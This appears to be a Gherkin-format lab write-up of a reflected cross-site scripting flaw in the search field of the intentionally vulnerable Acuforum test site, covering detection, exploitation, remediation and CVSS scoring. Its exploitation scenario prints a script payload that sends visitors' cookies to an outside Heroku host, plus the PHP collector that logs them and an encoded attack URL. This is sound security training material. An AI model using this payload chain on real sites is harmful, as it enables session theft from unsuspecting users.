## Version 1.4.1
## language: en

Feature:
  TOE:
    Acuforum
  Category:
    Improper neutralization of input during web page generation
  Location:
    http://testasp.vulnweb.com/Search.asp?tfSearch= - search (field)
  CWE:
    CWE-79: Improper neutralization of input during
    web page generation ('cross-site scripting')
    https://cwe.mitre.org/data/definitions/79.html
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Detect and exploit cross side scripting in the search page
  Recommendation:
    Always validate and sanitize the inputs fields

  Background:
  Hacker's software:
    | <Software name>   | <Version>       |
    | Ubuntu            | 18.04.3 LTS     |
    | Firefox           | 69.0            |
  TOE information:
    Given I am accessing the site https://testasp.vulnweb.com
    And I can search
    And the server is running Microsoft SQL server version 8.5
    And "ASP.NET"

  Scenario: Normal use case
    When I enter the search page
    Then I can see the results of my search

  Scenario: Static detection
    When I don't have access to source code
    Then I can't do the static detection

  Scenario: Dynamic detection
    When I create a search query with some HTML tags
    """
    <h1>Hello</h1>
    """
    And I click on "search posts" button
    And I can see my post in "h1" tag [evidence](img1.png)
    And I can conclude that it can be affected by cross side scripting

  Scenario: Exploitation
    When I use this JavaScript injection in conjunction with this vulnerability
    """
    <script>document.location="https://thawing-badlands-08862.herokuapp.com/
    cookiestealer.php?c="+document.cookie;</script>
    """
    And I use a simple "Heroku web app"
    """
    https://thawing-badlands-08862.herokuapp.com/cookiestealer.php
    """
    And I use a PHP code to store the cookies and redirect to Google website
    """
    <?php
    header ('Location:https://google.com');
            $cookies = $_GET["c"];
            $file = fopen('log.txt', 'a');
            fwrite($file,$cookies . "\n\n")
    ?>
    https://thawing-badlands-08862.herokuapp.com/log.txt
    """
    And I can intercept everyone who visits the page
    """
    http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Edocument.
    location%3D%22https%3A%2F%2Fthawing-badlands-08862.herokuapp.
    com%2Fcookiestealer.php%3Fc%3D%22%2Bdocument.cookie%3B%3C%2Fscript%3E
    """
    And I can store the cookies [evidence](img2.png)
    And I can conclude that it can be affected by cross-site scripting

  Scenario: Remediation
    Given the site is using an insecure form against cross site scripting
    When I input a value it must be inserted only if it is trusted Data
    And It must escape all special characters
    And It must escape all untrusted data based on the body,js,CSS and url
    And It must use White-List input validation
    And It must use OWASP auto-sanitization library
    And It must use OWASP content security policy
    And It must use output validation

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.4/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    5.2/10 (Medium) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.2/10 (Medium) - CR:M/IR:M

  Scenario: Correlations
    vbd/acuforum/0020-input-val-search
      Given I can create a JavaScript code provided by 0020-input-val-search
      When someone visits the search page
      Then I can steal the cookies of everyone who visit the page
